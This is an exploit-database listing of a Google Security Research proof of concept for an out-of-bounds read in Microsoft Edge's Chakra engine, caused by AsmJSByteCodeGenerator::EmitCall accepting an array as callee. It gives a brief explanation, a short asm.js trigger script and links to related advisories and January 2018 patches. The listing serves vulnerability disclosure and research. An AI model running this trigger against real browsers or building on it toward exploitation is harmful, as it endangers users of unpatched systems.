Lucene search
Google Security Research1337DAY-ID-29572HistoryJan 18, 2018 - 12:00 a.m.
Microsoft Edge Chakra - AsmJSByteCodeGenerator::EmitCall Out-of-Bounds Read Exploit
2018-01-1800:00:00
Google Security Research
0day.today
16
0.959 High
EPSS
Percentile
99.5%
Exploit for windows platform in category dos / poc
/*
AsmJSByteCodeGenerator::EmitCall which is used to emit call insturctions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as "arr[idx & ...]()". In these cases, the index register remains NoRegister which is (uint32_t)-1. It results in OOB read.
PoC:
*/
function Module() {
'use asm';
function f() {
arr();
}
function g() {
}
var arr = [g];
return f;
}
let f = Module();
f();
# 0day.today [2018-01-26] #Related
mscve
mscve
Chakra Scripting Engine Memory Corruption Vulnerability
2018-01-03 08:00:00
seebug
seebug
packetstorm
packetstorm
Microsoft Edge Chakra AsmJSByteCodeGenerator::EmitCall Call Handling
2018-01-18 00:00:00
nvd
nvd
osv
osv
cvelist
cvelist
cve
cve
prion
prion
Information disclosure
2018-01-04 14:29:00
Information disclosure
2018-01-04 14:29:00
Information disclosure
2018-01-04 14:29:00
veracode
veracode
Information Disclosure
2018-07-04 07:50:03
mskb
mskb
January 3, 2018âKB4056893 (OS Build 10240.17738)
2018-01-09 08:00:00
January 3, 2018âKB4056888 (OS Build 10586.1356)
2018-01-09 08:00:00
January 3, 2018âKB4056890 (OS Build 14393.2007)
2018-01-09 08:00:00
kaspersky
kaspersky
KLA11166 Multiple vunlerabilities in Microsoft Browsers
2018-01-03 00:00:00
nessus
nessus
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4056893)
2018-01-04 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4056891)
2018-01-04 00:00:00
Microsoft Windows Multiple Vulnerabilities (KB4056888)
2018-01-04 00:00:00
talosblog
talosblog
Microsoft Patch Tuesday - January 2018
2018-01-09 13:36:00
trendmicroblog
trendmicroblog